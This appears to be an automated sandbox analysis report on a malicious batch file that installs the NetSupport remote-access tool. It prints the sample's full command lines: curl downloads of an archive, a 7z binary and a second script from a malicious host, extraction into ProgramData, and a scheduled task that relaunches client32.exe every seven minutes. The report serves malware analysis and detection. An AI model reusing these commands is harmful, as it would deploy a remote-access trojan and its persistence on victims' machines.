Malware Analysis Report

2025-06-16 05:06

Sample ID 230527-j8er4abf2x
Target 11.bat
SHA256 b2069732f98d91fc2b2814c687115ab927191a0db26dd21a9ac0f7f79a65672b
Tags netsupport rat
Score 10/10

Analysis Overview

Threat Level: Known bad

The file 11.bat was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Creates scheduled task(s)

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2023-05-27 08:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2023-05-27 08:20
Reported 2023-05-27 08:22
Platform win7-20230220-en
Max time kernel 28s
Max time network 30s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1108 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\sett.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\7z.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\2.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\2.bat"

Network

N/A

Files

C:\ProgramData\sett.bat
C:\ProgramData\7z.bat
C:\ProgramData\2.bat

Analysis: behavioral2

Detonation Overview

Submitted 2023-05-27 08:20
Reported 2023-05-27 08:22
Platform win10v2004-20230220-en
Max time kernel 135s
Max time network 145s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

Signatures

NetSupport

rat netsupport

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\7zz.exe N/A
N/A N/A C:\ProgramData\client32.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\ProgramData\client32.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\ProgramData\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\client32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1644 wrote to memory of 1112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1112 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1644 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2168 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1644 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4392 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1644 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4664 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\xcopy.exe
PID 4664 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\xcopy.exe
PID 4664 wrote to memory of 3348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4664 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3348 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\ProgramData\7zz.exe
PID 4664 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4664 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4712 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\ProgramData\client32.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\sett.bat"

C:\Windows\system32\curl.exe

curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/tempy.7z" -o "C:\ProgramData\tempy.7z"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\7z.bat"

C:\Windows\system32\curl.exe

curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/7z.exe" -o "C:\ProgramData\7zz.exe"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\2.bat"

C:\Windows\system32\curl.exe

curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/2.bat" -o "C:\ProgramData\2.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\2.bat"

C:\Windows\system32\xcopy.exe

xcopy /h /y 7zz.exe C:\ProgramData\

C:\Windows\system32\cmd.exe

cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\

C:\Windows\system32\xcopy.exe

xcopy /h /y tempy.7z C:\ProgramData\

C:\Windows\system32\timeout.exe

TIMEOUT /T 2

C:\ProgramData\7zz.exe

C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\

C:\Windows\system32\schtasks.exe

SCHTASKS /create /F /tn "VCC_runner2" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 7 /sd 01/01/2022 /st 00:00

C:\Windows\system32\cmd.exe

cmd /c C:\ProgramData\client32.exe

C:\ProgramData\client32.exe

C:\ProgramData\client32.exe

Network


Files

C:\ProgramData\sett.bat
C:\ProgramData\7z.bat
C:\ProgramData\2.bat
C:\ProgramData\7zz.exe
C:\ProgramData\tempy.7z
C:\ProgramData\client32.exe
C:\ProgramData\PCICL32.dll
C:\ProgramData\pcicapi.dll
C:\ProgramData\pcichek.dll
C:\ProgramData\MSVCR100.dll
C:\ProgramData\NSM.LIC
C:\ProgramData\client32.ini
C:\ProgramData\TCCTL32.DLL
C:\ProgramData\HTCTL32.DLL